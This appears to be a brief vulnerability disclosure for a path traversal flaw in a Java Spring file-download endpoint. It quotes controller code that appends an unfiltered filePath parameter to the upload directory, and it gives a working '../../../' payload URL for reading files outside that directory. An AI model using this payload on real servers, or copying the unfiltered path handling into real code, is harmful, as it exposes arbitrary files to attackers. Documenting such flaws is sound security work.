- Code segment (src/main/java/com/java2nb/common/controller/FileController.java):
java
@RequestMapping(value = "/download")
public void fileDownload(String filePath, String fileName, HttpServletResponse resp) throws Exception {
String realFilePath = jnConfig.getUploadPath() + filePath;
InputStream in = new FileInputStream(realFilePath);
// Set response header and URL encode the file name
fileName = URLEncoder.encode(fileName, "UTF-8");
resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);
resp.setContentLength(in.available());
OutputStream out = resp.getOutputStream();
byte[] b = new byte[1024];
int len = 0;
while ((len = in.read(b)) != -1) {
out.write(b, 0, len);
}
out.flush();
out.close();
in.close();
}
2. This code accepts two parameters, filePath and fileName, without implementing any filtering. For testing, create a test directory on the C drive and write a 1.txt file inside it.
3.payload:http://192.168.56.1/common/sysFile/download?filePath=../../../test/1.txt&fileName=1.txt
浙公网安备 33010602011771号